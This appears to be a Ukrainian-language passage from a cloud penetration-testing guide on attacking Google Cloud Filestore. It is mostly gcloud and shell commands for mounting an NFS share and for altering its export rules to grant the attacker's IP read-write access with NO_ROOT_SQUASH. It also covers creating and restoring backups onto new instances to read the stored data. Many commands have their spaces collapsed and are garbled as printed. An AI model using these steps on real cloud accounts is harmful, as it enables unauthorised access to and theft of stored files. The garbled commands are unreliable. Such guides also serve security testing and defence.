Спільна файлова система може містити чутливу інформацію, цікаву з точки зору атакуючого. З доступом до Filestore можна підключити її:
sudoapt-getupdatesudoapt-getinstallnfs-common# Check the share nameshowmount-e<IP># Mount the sharemkdir/mnt/fssudomount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs
Щоб знайти IP-адресу екземпляра файлового сховища, перевірте розділ переліку сторінки:
Видалення обмежень та отримання додаткових дозволів
Якщо зловмисник не знаходиться в IP-адресі з доступом до спільного використання, але у вас є достатньо дозволів для його зміни, можливо видалити обмеження або доступ до нього. Також можливо надати більше привілеїв для вашого IP-адреси, щоб мати адміністративний доступ до спільного використання:
gcloudfilestoreinstancesupdatenfstest \--zone=<exact-zone> \--flags-file=nfs.json# Contents of nfs.json{"--file-share":{"capacity":"1024","name":"<share-name>","nfs-export-options": [{"access-mode":"READ_WRITE","ip-ranges": ["<your-ip-private-address>/32"],"squash-mode":"NO_ROOT_SQUASH","anon_uid":1003,"anon_gid":1003}]}}
Відновлення резервної копії
Якщо є резервна копія, можна відновити її на існуючому або новому екземплярі, щоб його інформація стала доступною:
# Create a new filestore if you don't want to modify the old onegcloudfilestoreinstancescreate<new-instance-name> \--zone=<zone> \--tier=STANDARD \--file-share=name=vol1,capacity=1TB \--network=name=default,reserved-ip-range=10.0.0.0/29# Restore a backups in a new instancegcloudfilestoreinstancesrestore<new-instance-name> \--zone=<zone> \--file-share=<instance-file-share-name> \--source-backup=<backup-name> \--source-backup-region=<backup-region># Follow the previous section commands to mount it
Створення резервної копії та відновлення
Якщо у вас немає доступу до ресурсу та ви не хочете його змінювати, можна створити резервну копію та відновити її, як вже згадувалося раніше:
# Create share backupgcloudfilestorebackupscreate<back-name> \--region=<region> \--instance=<instance-name> \--instance-zone=<instance-zone> \--file-share=<share-name># Follow the previous section commands to restore it and mount it
